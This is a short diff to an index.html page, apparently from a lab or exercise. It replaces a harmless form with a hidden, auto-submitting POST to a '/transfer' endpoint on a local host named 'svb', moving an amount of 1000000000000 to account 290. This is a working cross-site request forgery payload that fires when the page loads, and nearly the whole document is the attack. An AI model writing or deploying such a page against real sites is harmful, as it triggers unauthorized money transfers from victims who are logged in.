--- a/index.html
+++ b/index.html
@@ -1,3 +1,5 @@
-<form id=form1 action="https://www.google.com/" method="GET">
+<form id=form1 action="http://svb:5003/transfer/1" method="POST">
+	<input type="hidden" name="amount" value="1000000000000" />
+	<input type="hidden" name="account" value="290" />
 </form>
 <script>document.getElementById('form1').submit();</script>
